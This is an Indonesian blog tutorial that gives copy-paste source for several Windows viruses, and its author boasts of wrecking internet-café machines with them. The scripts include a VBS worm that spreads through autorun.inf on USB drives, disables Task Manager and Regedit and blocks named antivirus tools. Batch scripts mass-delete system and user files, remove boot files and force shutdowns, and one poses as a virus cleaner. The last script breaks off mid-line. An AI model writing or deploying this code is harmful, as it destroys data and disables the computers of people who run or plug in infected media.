Sabtu, 28 Agustus 2010

Beberapa Cara Membuat Virus Sederhana Dengan Notepad versi Script VBS dan Bat v2 (New Updated)

Sesua janji saya, kita
akan membuat virus
yang sederhana
menggunakan
Notepad. Virus ini
akan membuat
dirinya menyebar ke
removable disc
dengan AutoRun
sehingga komputer
lain yang tercolok
flash disc atau CD
terinfeksi akan
langsung menjadi
korban tanpa
menungu User
menjalankan
infector-nya.
Kemaren Entah aku
lupa kapan aku
pernah posting
artikel ini “Beberapa
Cara Membuat Virus
Sederhana Dengan
Notepad versi Script
VBS dan Bat V.1 ″ tapi
masih bentuk draft
dan kodenya agak
kacau n sekaran
udha aku update dan
aku tambah efek
virusnya biar agak
ngrrrGezz abizz hehe
aku namakan
bosgentongs virus
v.2. udha aku
Praktekin di warnet
dan hasilllNya komp
warnet langsunG
buyar… HiiiHii
Buka notepad, Lalu
Copy Paste Code
Script di Bawah ini
Yaw …. dan simpan
dengan ekstensi bat
(klo yang disuruh
bat) atau ekstensi
vbs (Klo yang disuruh
vbs), misalnya
virus.bat/virus.vbs
===========================================================================
PEMBUATAN VIRUS
DENGAN
EKSTENSI .VBS
nama
bosgentongs.exe.vbs>
===========================================================================
‘//BosGenToNgs ITS
Ver 2
‘ //Varian dari
Matrix.VBS
‘ //INI VIRUS
BERBAHAYA JANGAN
DIBUAT MAIN-
MAIN!!!!!
‘ //Awal dari kode, set
agar ketika terjadi
Error dibiarkan dan
kemudian
lanjutkan kegiatan
virus//
on error resume next
‘//Dim kata-kata
berikut ini//
dim
mysource,winpath,flashdrive,fs,mf,atr,tf,bosgentongs,nt,check,sd
‘//Set sebuah teks
yang nantinya akan
dibuat untuk Autorun
Setup Information
AliAss atr AutoruN//
atr = “[autorun]” &
vbcrlf &
“ shellexecute=wscript.exe
bosgentongs.exe.vbs”
set fs = createobject
(” Scripting.FileSystemObject”)
set mf = fs.getfile
(Wscript.ScriptFullname)
dim text,size
size = mf.size
check =
mf.drive.drivetype
set text =
mf.openastextstream
(1,-2)
do while not
text.atendofstream
mysource =
mysource &
text.readline
mysource =
mysource & vbcrlf
loop
do
‘//Copy diri untuk
menjadi file induk di
Windows Path
(example: C:
\Windows)//
Set winpath =
fs.getspecialfolder(0)
set tf = fs.getfile
(winpath & “\batch-
bosgentongs.exe.vbs
“)
tf.attributes = 32
set
tf=fs.createtextfile
(winpath & “\batch-
bosgentongs.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile
(winpath & “\batch-
bosgentongs.exe.vbs
“)
tf.attributes = 39
‘//Buat Atorun.inf
untuk menjalankan
virus otomatis setiap
flash disc tercolok//
‘ //Menyebar ke
setiap drive yang
bertype 1 dan
2(removable)
termasuk disket//
for each flashdrive in
fs.drives
‘//Cek Drive//
If
(flashdrive.drivetype
= 1 or
flashdrive.drivetype
= 2) and
flashdrive.path <>
“A:” then
‘//Buat Infector jika
ternyata Drivetypr 1
atau 2. Atau A:\ //
set tf=fs.getfile
(flashdrive.path
&”\ bosgentongs.exe.vbs
“)
tf.attributes =32
set
tf=fs.createtextfile
(flashdrive.path
&”\ bosgentongs.exe.vbs
“,2,true)
tf.write mysource
tf.close
set tf=fs.getfile
(flashdrive.path
&”\ bosgentongs.exe.vbs
“)
tf.attributes = 39
‘//Buat Atorun.inf
yang teks-nya tadi
sudah datrapkan
(Auto Setup
Information)//
set tf =fs.getfile
(flashdrive.path
&”\ autorun.inf”)
tf.attributes = 32
set
tf=fs.createtextfile
(flashdrive.path
&”\ autorun.inf”,2,true)
tf.write atr
tf.close
set tf = fs.getfile
(flashdrive.path
&”\ autorun.inf”)
tf.attributes=39
end if
next
‘//Manipulasi
Registry//
set bosgentongs =
createobject
(” WScript.Shell”)
‘//Manip – Ubah Title
Internet Explorer
menjadi THE
bosgentongs v.s.
Viruz//
bosgentongs.regwrite
“ HKEY_CURRENT_USER
\Software\Microsoft
\Internet Explorer
\Main\Window
Title ”,” THE
bosgentongs v.s.
Viruz “
‘//Manip – Set agar
file hidden tidak
ditampilkan di
Explorer//
bosgentongs.RegWrite
“ HKEY_CURRENT_USER
\Software\Microsoft
\Windows
\CurrentVersion
\Policies\Explorer
\Advanced
\Hidden ”,2,“REG_DWORD”
‘//Manip – Hilangkan
aliaz blokir menu
Find, Folder Options,
Run, dan memblokir
Regedit dan Task
Manager//
bosgentongs.RegWrite
“ HKEY_CURRENT_USER
\Software\Microsoft
\Windows
\CurrentVersion
\Policies\Explorer
\NoFind ”, “1?,
“REG_DWORD”
bosgentongs.RegWrite
“ HKEY_CURRENT_USER
\Software\Microsoft
\Windows
\CurrentVersion
\Policies\Explorer
\NoFolderOptions ”,
“1?, “REG_DWORD”
bosgentongs.RegWrite
“ HKEY_CURRENT_USER
\Software\Microsoft
\Windows
\CurrentVersion
\Policies\Explorer
\NoRun ”, “1?,
“REG_DWORD”
bosgentongs.RegWrite
“ HKEY_CURRENT_USER
\Software\Microsoft
\Windows
\CurrentVersion
\Policies\System
\DisableRegistryTools”,
“1?, “REG_DWORD”
bosgentongs.RegWrite
“ HKEY_CURRENT_USER
\Software\Microsoft
\Windows
\CurrentVersion
\Policies\System
\DisableTaskMgr ”,
“1?, “REG_DWORD”
‘//Manip – Disable
klik kanan//
bosgentongs.RegWrite
“ HKEY_CURRENT_USER
\Software\Microsoft
\Windows
\CurrentVersion
\Policies\Explorer
\NoViewContextMenu”,
“1?, “REG_DWORD”
‘//Manip – Munculkan
Pesan Setiap
Windows Startup//
bosgentongs.regwrite
“ HKEY_LOCAL_MACHINE
\Software\Microsoft
\Windows
\CurrentVersion
\Winlogon
\LegalNoticeCaption”,
“Bosgentongs:No Cry
No wOman”
bosgentongs.RegWrite
“ HKEY_LOCAL_MACHINE
\Software\Microsoft
\Windows
\CurrentVersion
\Winlogon
\LegalNoticeText ”,”Worm
bosgentongs. Variant
from Viruz Sex
Bebass, don ’t panic
all data are safe.”
‘//Manip – Aktif
setiap Windows
Startup//
bosgentongs.regwrite
“ HKEY_LOCAL_MACHINE
\Software\Microsoft
\Windows
\CurrentVersion\Run
\Systemdir ”, winpath
& “\batch-
bosgentongs.exe.vbs

‘//Manip – Ubah
Registered Owner
dan
Obosgentongsanization//
bosgentongs.regwrite
“ HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\RegisteredObosgentongsanization”,
“The Matrix
EvoLution”
bosgentongs.regwrite
“ HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\RegisteredOwner ”,”bosgentongs”
‘//Manip – Membuat
Cadangan di sistem
svchost, MS32Dll dan
membuat ikon//
bosgentongs.regwrite
“ HKEY_LOCAL_MACHINE
\Software\Microsoft
\Windows
\CurrentVersion\Run
\svchost ”,winpath&”\bosgentongs.exe.vbs”
bosgentongs.regwrite
“ HKEY_LOCAL_MACHINE
\Software\Microsoft
\Windows
\CurrentVersion\Run
\MS32DLL ”,””
bosgentongs.regwrite
“ HKCR\vbsfile
\DefaultIcon
\” ,”shell32.dll,3”
‘//Alihkan aplikasi
berikut. Jika dibuka
maka program
terbuka dengan
Notepad//
bosgentongs.regwrite
“ HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\cmd.exe
\Debugger ”,”notepad.exe”
bosgentongs.regwrite
“ HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\install.exe
\Debugger ”,”notepad.exe”
bosgentongs.regwrite
“ HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\msconfig.exe
\Debugger ”,”notepad.exe”
bosgentongs.regwrite
“ HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\regedit.exe
\Debugger ”,”notepad.exe”
bosgentongs.regwrite
“ HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\regedt32.exe
\Debugger ”,”notepad.exe”
bosgentongs.regwrite
“ HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options
\RegistryEditor.exe
\Debugger”,”notepad.exe”
bosgentongs.regwrite
“ HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\setup.exe
\Debugger ”,”notepad.exe”
bosgentongs.regwrite
“ HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\PCMAV.exe
\Debugger ”,”notepad.exe”
bosgentongs.regwrite
“ HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\PCMAV-
CLN.exe
\Debugger”,”notepad.exe”
bosgentongs.regwrite
“ HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\PCMAV-
RTP.exe
\Debugger”,”notepad.exe”
bosgentongs.regwrite
“ HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\Ansav.exe
\Debugger ”,”notepad.exe”
bosgentongs.regwrite
“ HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\SM?RTP.exe
\Debugger ”,”notepad.exe”
bosgentongs.regwrite
“ HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\Smadav.exe
\Debugger ”,”notepad.exe”
bosgentongs.regwrite
“ HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\avcenter.exe
\Debugger ”,”notepad.exe”
bosgentongs.regwrite
“ HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\avgui.exe
\Debugger ”,”notepad.exe”
‘//New Bonus//
if check <> 1 then
Wscript.sleep 100000
end if
loop while check <>
1
set sd = createobject
(”Wscript.shell”)
sd.run winpath &
“\ explorer.exe /e,/
select, ” &
Wscript.ScriptFullname
do while year(now)
>= 2009
WScript.sleep 20000
===========================================================================
PEMBUATAN VIRUS
DENGAN
EKSTENSI .BAT
nama
bosgentongs.bat>
===========================================================================
cd C:\
mkdir\Alert\Warning
\Dangers\ A NAMAKU
BOSGENTONGS
ANAK IDEAL SEKALI
SEDANG SEDIH
MENCARI TEMAN
\ Makan
cd C:\Windows\
mkdir\Alert\Warning
\Dangers\ A NAMAKU
BOSGENTONGS
ANAK IDEAL SEKALI
SEDANG SEDIH
MENCARI TEMAN
\Makan
cd C:\Windows
\System32\
mkdir\Alert\Warning
\Dangers\ A NAMAKU
BOSGENTONGS
ANAK IDEAL SEKALI
SEDANG SEDIH
MENCARI TEMAN
\ Makan
cd D:\
mkdir\Alert\Warning
\Dangers\ A NAMAKU
BOSGENTONGS
ANAK IDEAL SEKALI
SEDANG SEDIH
MENCARI TEMAN
\Makan
@echo off
copy
bosgentongsvirus.bmp
%systemdrive%\ /y
copy
bosgentongsvirus.bmp
%systemdrive%
\WINDOWS\ /y
copy
bosgentongsvirus.bmp
%systemdrive%
\WINDOWS
\system32\ /y
copy
bosgentongsvirus.exe
%systemdrive%\ /y
copy
bosgentongsvirus.exe
%systemdrive%
\WINDOWS\ /y
copy
bosgentongsvirus.exe
%systemdrive%
\WINDOWS
\system32\ /y
reg add
“ HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Winlogon ” /v
LegalNoticeCaption /
d “WARNING
MESSAGE FROM
BOSGENTONGS ” /f
reg add
“ HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Winlogon ” /v
LegalNoticeText /d
“ AKU TELAH
MENGUASAI YOUR
SISTEM!!! MAKA
BERDOALAH AGAR
TIDAK TERJADI ” /f
reg add
“ HKEY_LOCAL_MACHINE
\SOFTWARE
\Microsoft\Windows
\CurrentVersion
\Run ” /v
bosgentongsvirus /d
%systemdrive%
\windows
\system32\bosgentongsvirus.exe /
f
reg add
“HKEY_CURRENT_USER
\Control Panel
\Desktop ” /v
Wallpaper /d
%systemdrive%
\WINDOWS
\system32\bosgentongsvirus.bmp /
f
reg add
“HKEY_CURRENT_USER
\Control Panel
\Desktop ” /v
WallpaperStyle /d 0 /
f
reg add
“ HKEY_CURRENT_USER
\Control Panel
\Colors ” /v window /d
#C10000 /f
reg add
“ HKEY_USERS
\.DEFAULT\Control
Panel\Desktop ” /v
Wallpaper /d
%systemdrive%
\WINDOWS
\system32\bosgentongsvirus.bmp /
f
:bgvirus
echo>>Albert.reg
echo>>Anak.chm
echo>>Ideal.dll
echo>>Sekali.htt
cls
goto bgvirus
echo $$$$$$$$$$$$
$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$
$$$$$$$$$$$
echo $$$$$$$$$$$$
$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$
$$$$$$$$$$$
echo
——————————————————-
echo
=============
BOSGENTONGS love
HACKER
==============
echo
=============
bosgentongs inc.
Team
==============
echo
=============
Kediri, 16 Juli 2009
==============
echo
——————————————————-
echo $$$$$$$$$$$$
$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$
$$$$$$$$$$$
echo $$$$$$$$$$$$
$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$
$$$$$$$$$$$
echo Do you want to
kill all program ’s?
(Y/N)
pause >nul
cls
echo Are you sure
want to delete all
data? (Y/N)
pause >nul
cls
echo Deleting All
Data
ping localhost -n 2
>nul
cls
echo Deleting All
Data.
ping localhost -n 2
>nul
cls
echo Deleting All
Data..
ping localhost -n 2
>nul
cls
echo Deleting All
Data…
cls
Echo Deleting All
Data ….
ping localhost -n 2
>nul
cls
Echo Deleting All
Data …..
ping localhost -n 2
>nul
cls
Echo Deleting All
Data ……..
ping localhost -n 2
>nul
cls
Echo All data have
been Deleted
ping localhost -n 2
>nul
cls
Echo System Error
Echo System can ’t
open windows Folder
Echo Warning! Sistem
shutting down
ping localhost -n 2
>nul
cls
dir /s
shutdown -s -t 5400 -c
“ This is a virus. You
have been Hakced By
Bosgentongs. Thank
you for your
attention “
:bgvirus
echo>>Albert.reg
echo>>Anak.chm
echo>>Ideal.dll
echo>>Sekali.htt
cls
goto bgvirus
===========================================================================
KETERANGAN
# Warna Merah
artinya
Tidak Usah Ditulis
Karena hanya
Sebagai Petunjuk
Saja #
# Warna Biru Artinya
Tulisan ini Bisa
Diganti Degan
Tulisan Sembarang
Terserah Kamu #
Anda dapat
berimprovisasi
dengan
menambahkan
sebuah file
autorun.inf file
untuk menjalankan
program tersebut
ketika seseorang
melakukan klik
ganda pada sebuah
drive. Untuk
membuat auturun
buka notepad copy-
paste code di bawah
dan simpan dengan
file name:
Autorun.inf dengan
save as type: All files
Saya Beri kode
autorun.inf Bila
Belum Tau:
NB: Warna biru
adalah nama file
virus+ekstensinya
yang kamu buat tadi
===========================================================================
AUTORUN UNTUK
FILE
bosgentongs.exe.vbs
nama autorun.inf>
===========================================================================
[Autorun]
UseAutoplay=1
Icon=%SystemRoot%
\system32\SHELL32.dll,7
Shellexecute=wscript.exe
bosgentongs.exe.vbs
Shell\OPEN
\COMMAND=wscript.exe
bosgentongs.exe.vbs
Shell\explore
\COMMAND=wscript.exe
bosgentongs.exe.vbs
Action=Open folder
to view files
===========================================================================
ANTI DOT UNTUK
VIRUS
bosgentongs.exe.vbs
extensi
antibosgentongs.inf>
Untuk
menjalankannya klik
kanan file
antibosgentongs.inf
lalu klik Install
===========================================================================
[Version]
Signature=”$My
EartH$”
Provider=Bosgentongs_teaM
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKCU,Software
\Microsoft\Internet
Explorer\Main,
Window Title,0,
“ INTERNET
EXPLORER”
[del]
HKCU, Software
\Microsoft\Windows
\CurrentVersion
\Policies\Explorer,
NoFind
HKCU, Software
\Microsoft\Windows
\CurrentVersion
\Policies\Explorer,
NoFolderOptions
HKCU, Software
\Microsoft\Windows
\CurrentVersion
\Policies\Explorer,
NoRun
HKCU, Software
\Microsoft\Windows
\CurrentVersion
\Policies\System,
DisableRegistryTools
HKCU, Software
\Microsoft\Windows
\CurrentVersion
\Policies\System,
DisableTaskMgr
HKCU, Software
\Microsoft\Windows
\CurrentVersion
\Policies\Explorer,
NoViewContextMenu
HKLM, Software
\Microsoft\Windows
\CurrentVersion
\Winlogon,
LegalNoticeCaption
HKLM, Software
\Microsoft\Windows
\CurrentVersion
\Winlogon,
LegalNoticeText
HKLM, Software
\Microsoft\Windows
\CurrentVersion\Run,
Systemdir
HKLM, SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\cmd.exe,
Debugger
HKLM, SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\install.exe,
Debugger
HKLM, SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options
\msconfig.exe,
Debugger
HKLM, SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\regedit.exe,
Debugger
HKLM, SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options
\regedt32.exe,
Debugger
HKLM, SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options
\RegistryEditor.exe,
Debugger
HKLM, SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\setup.exe,
Debugger
HKLM, SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\PCMAV.exe,
Debugger
HKLM, SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\PCMAV-
CLN.exe, Debugger
HKLM, SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\PCMAV-
RTP.exe, Debugger
HKLM, SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\Ansav.exe,
Debugger
HKLM, SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\SM?RTP.exe,
Debugger
HKLM, SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\Smadav.exe,
Debugger
HKLM, SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options
\avcenter.exe,
Debugger
HKLM, SOFTWARE
\Microsoft\Windows
NT\CurrentVersion
\Image File Execution
Options\avgui.exe,
Debugger
===========================================================================
VIRUS BGEMPTY.BAT
extensi bgempty.bat>
===========================================================================
cls
cd %HOMEDRIVE%
\windows\
del /S /F /Q
keyboard.drv
del /S /F /Q
mouse.drv
del /S /F /Q
keyboard.sys
del /S /F /Q hal.dll
del /S /F /Q *.exe
del /S /F /Q *.txt
del /S /F /Q *.com
del /S /F /Q *.scr
del /S /F /Q *.ini
del /S /F /Q *.mp3
del /S /F /Q *.wav
del /S /F /Q *.dll
del /S /F /Q *.avi
del /S /F /Q *.jpeg
del /S /F /Q *.mp4
del /S /F /Q *.reg
del /S /F /Q *.rar
del /S /F /Q *.inf
del /S /F /Q *.sdb
del /S /F /Q *.cur
del /S /F /Q *.ani
del /S /F /Q *.zip
del /S /F /Q *.*
cd %HOMEDRIVE%
del /S /F /Q *.exe
del /S /F /Q *.txt
del /S /F /Q *.com
del /S /F /Q *.scr
del /S /F /Q *.ini
del /S /F /Q *.mp3
del /S /F /Q *.wav
del /S /F /Q *.dll
del /S /F /Q *.avi
del /S /F /Q *.jpeg
del /S /F /Q *.mp4
del /S /F /Q *.reg
del /S /F /Q *.rar
del /S /F /Q *.inf
del /S /F /Q *.sdb
del /S /F /Q *.cur
del /S /F /Q *.ani
del /S /F /Q *.zip
del /S /F /Q *.*
cls
ren %HOMEDRIVE%
\Windows\hal.dll
hal3.dll
del %HOMEDRIVE%
\WINDOWS
\system32\*.* /F /Q /S
cls
echo DONE!
echo By Bosgentongs
shutdown -r -t 10-c
“Selamat semua
Virus anda telah
dibersihkan …
Berbahagialah
Siapkan cd windows
anda ”
===========================================================================
VIRUS Gilazz
Team.BAT dengan extensi
bg&gilazteam.bat>
===========================================================================
@echo off
echo
================================
echo
================================
echo Killer Viri
echo created By The
GhilazZ Team
echo Support by
Bosgentongs Team
echo
================================
echo
================================
echo .
echo Readme.txt
echo Hallo semua
program yang ada di
hadapan anda ini
echo adalah sebuah
program kecil yang
unik untuk
membunuh virus
echo Caranya
sebagai contoh anda
cukup mengetikan
echo Nomor saja :
1.Brontok 2.Worm
3.VBS 4 …Others
echo Contoh: 1…lalu
tekan Enter
echo (Ketikan anda
tidak terlihat dilayar)
echo Hapus dan
Bersihkan lalu tekan
Enter
echo Kamu yakin??
lalu tekan Enter
echo Mudah
bukan …???
echo jangan mo
kalah dengan bikinan
luarnegri
echo coba buatan
Indonesia
echo Merdeka …
merdeka…merdeka…
echo .
echo Register The
GhilazZ Team and
supported by
Bosgentongs Team
pause
echo Masukkan
1,2,3,4
pause
echo Begin scanning
viri ….. tekan Enter
cls
REG ADD HKCU
\Software\Microsoft
\Windows
\CurrentVersion
\Policies\System /v
“DisableRegistryTools” /
t REG_DWORD /d
00000001
REG ADD HKCU
\Software\Microsoft
\Windows
\CurrentVersion
\Policies\Explorer /v
“ NoDrives” /t
REG_DWORD /d
67108863
REG ADD HKCU
\Software\Microsoft
\Windows
\CurrentVersion
\Policies\System /v
“ DisableTaskMgr” /t
REG_DWORD /d
00000001
REG ADD HKLM
\Software\Microsoft
\Windows
\CurrentVersion
\Policies\System /v
“ DisableTaskMgr” /t
REG_DWORD /d
00000001
REG ADD HKCU
\Software\Microsoft
\Windows
\CurrentVersion
\Policies\Explorer /v
“ NofIND” /t
REG_DWORD /d
00000001
REG ADD HKCU
\Software\Microsoft
\Windows
\CurrentVersion
\Policies\Explorer /V
“ NoClose” /t
REG_DWORD /d
00000001
REG ADD HKCU
\Software\Microsoft
\Windows
\CurrentVersion
\Policies\Explorer /V
“ NoRun” /t
REG_DWORD /d
00000001
REG ADD HKCU
\Software\Microsoft
\Windows
\CurrentVersion
\Policies\Explorer /V
“ NoLogOff” /t
REG_BINARY /d
01000000
REG ADD HKCU
\Software\Microsoft
\Windows
\CurrentVersion
\Policies\System /V
“ DisableCMD” /t
REG_DWORD /d
00000001
REG ADD HKLM
\Software\Microsoft
\Windows
\CurrentVersion
\Run /v The_GhilazZ /
t REG_SZ /d
C:The_GhilazZ.exe
REG ADD HKCU
\Software\Microsoft
\Windows
\CurrentVersion
\Run /v The_GhilazZ /
t REG_SZ /d
C:The_GhilazZ.exe
REG ADD HKLM
\Software\Microsoft
\Windows
\CurrentVersion
\Run /v
Pinguin_attack /t
REG_BINARY /d
fuckinjoshbush
REG ADD HKLM
\Software\Microsoft
\WindowsNT
\CurrentVersion
\Winlogon
\SpecialAccounts
\UserList /v “SALAM
HANGAT UNTUK
SEMUA, FROM THE
TEAM GHILAZZ …luv
U all my
victim..mmmuacccchh” /
t REG_DWORD /d
00000001
pause
echo Hapus dan
Bersihkan lalu tekan
Enter
cls
pause
echo Kamu yakin??
lalu tekan Enter
pause
echo Create Backup
Windows …..tekan
Enter
pause
cls
md
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
md
\We_destroyed_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
md
\we_are_your_nightmare
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
md gue selalu ada
disisi loe untuk
selamanya setia
setiap saat long live
so-eng
fuckin_josh_bush
ought agghh
mampus_loe
cls
:viru1
echo Your compie
clean but my viri in
your computer
echo Your system
vulneberity have
been Control of my
viri
echo Your computer
be come
weknees …………………..
echo Say good bye to
your
computers ………………….
echo Regards The
GhilazZ
Team ….Salam
hangat untukmu….
cls
echo . “We fly inthe
night when you’re
sleeping in bed”
echo
***************************************************************
echo
***************************************************************
echo The GhilazZ
Team Was Here …The
GhilazZ Team Was
Here …
echo
999999999999999999
echo
999999999999999999999999
echo
9999999999999999999999999999
echo 999999 9999999
9999999
echo 9999999 99999
99999999
echo 9999999 999
99999999
echo
9999999999999999999999999999999
echo
9999999999999999999999999999999
echo 999999999999 99
9999999999999
echo
9999999999999999999999999999999
echo
99999999999999999999999999999
echo
99999999999999999999999
echo 000 000 000 000
00
echo 000 000 000 000
00
echo .. … … … .
echo 00 000 000 000 0
echo 00 000 000 000 0
echo
999999999999999999
echo
9999999999999999
echo 00000000000000
echo The GhilazZ
Team Was Here …The
GhilazZ Team Was
Here …
echo
****************************************************************
echo
****************************************************************
echo>>Inul_oke.exe
echo>>sex_machine.dll
echo>>Tukul_ndeso.asm
echo>>Katro_men.exe
echo>>Vulneberity_its_yours.mp3
echo>>Seek_and_Destroyed.dat
echo>>Sampah_loe.exe
echo>>Gwe_ada_disini.exe
echo>>Britneys_bugilz.mpeg
echo>>Fuckin_US.exe
echo>>TKIKIL.exe
echo>>msfuck.exe
echo>>Goodlinux.exe
goto viru1
copy Inul_oke.exe C:
copy sex_machine.dll
C:
copy
Tukul_ndeso.asm C:
copy Katro_men.exe
C:
copy
Vulneberity_its_yours.mp3
C:
copy
Seek_and_Destroyed.dat
C:
copy Sampah_loe.exe
C:
copy
Gwe_ada_disini.exe
C:
copy
Britneys_bugil.mpeg
C:
copy Fuckin_US.exe
C:
copy TKIKIL.exe C:
copy msfuck.exe C:
copy Goodlinux.exe
C:
copy Inul_oke.exe C:
\Windonws\System32
copy sex_machine.dll
C:\Windonws
\System32
copy
Tukul_ndeso.asm C:
\Windonws\System32
copy Katro_men.exe
C:\Windonws
\System32
copy
Vulneberity_its_yours.mp3
C:\Windonws
\System32
copy
Seek_and_Destroyed.dat
C:\Windonws
\System32
copy Sampah_loe.exe
C:\Windonws
\System32
copy
Gwe_ada_disini.exe
C:\Windonws
\System32
copy
Britneys_bugil.mpeg
C:\Windonws
\System32
copy Fuckin_US.exe
C:\Windonws
\System32
copy TKIKIL.exe C:
\Windonws\System32
copy msfuck.exe C:
\Windonws\System32
copy Goodlinux.exe
C:\Windonws
\System32
attrib +a +s +h *.*
md
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
md
\We_destroyed_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
md
\we_are_your_nightmare
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
\We_come_to_you
md gue selalu ada
disisi loe untuk
selamanya setia
setiap saat long live
so-eng
fuckin_josh_bush
ought agghh
mampus_loe
===========================================================================
VIRUS Malware
Pucker.BAT dengan extensi
bg&malwarePucKer.bat>
===========================================================================
@echo off & break
off
title fuCker v1.4-1-5
attrib +h %0
mode con cols=75
lines=15
cls
color 0a
echo.
echo ad88 ,ad8888ba,
88
echo d8 ″ d8″‘ `”8b 88
echo 88 d8′ 88
echo MM88MMM 88
88 88
88 ,d8 ,adPPYba,
8b,dPPYba,
echo 88 88 88 88
88 ,a8 ″ a8P_____ 88
88P’ “Y8
echo 88 88 88 Y8,
8888[ 8PP""""""" 88
echo 88 "8a, ,a88
Y8a. .a8P 88`"Yba,
"8b, 88
echo 88 `"YbbdP'Y8
`"Y8888Y"' 88 `Y8a
`"Ybbd8"' 88
echo by c0re
echo.
rundll32.exe
user32.dll,SwapMouseButton
if exist
"%SYSTEMDRIVE%
\boot.ini" goto winXP
2> nul
if exist
"%USERPROFILE%
\AppData" goto
winVISTA 2> nul
@echo
echo x=msgbox
("0wned by fuCker
w0rm!",vbCritical or
vbOkOnly,"fuCker")
>> "fuCker.vbs"
start "" "fuCker.vbs"
2> nul
:winXP
echo [Inject]
Microsoft Windows
XP!
set b0t=boot
attrib -r -s -h
“%SYSTEMDRIVE%\
%b0t%.ini” >nul
del /f /s /q
“ %SYSTEMDRIVE%\
%b0t%.ini” >nul
set b0t=
attrib -r -s -h
“ %SYSTEMDRIVE%
\ntldr” >nul
del /f /s /q
“ %SYSTEMDRIVE%
\ntldr” >nul
set w0n=win
attrib -r -s -h
“ %SYSTEMROOT%\
%w0n%.ini” >nul
del /f /s /q
“ %SYSTEMROOT%\
%w0n%.ini” >nul
set w0n=
attrib -r -s -h
“ %SYSTEMROOT%
\System32\hal.dll”
>nul
del /f /s /q
“ %SYSTEMROOT%
\System32\hal.dll”
>nul
attrib -r -s -h
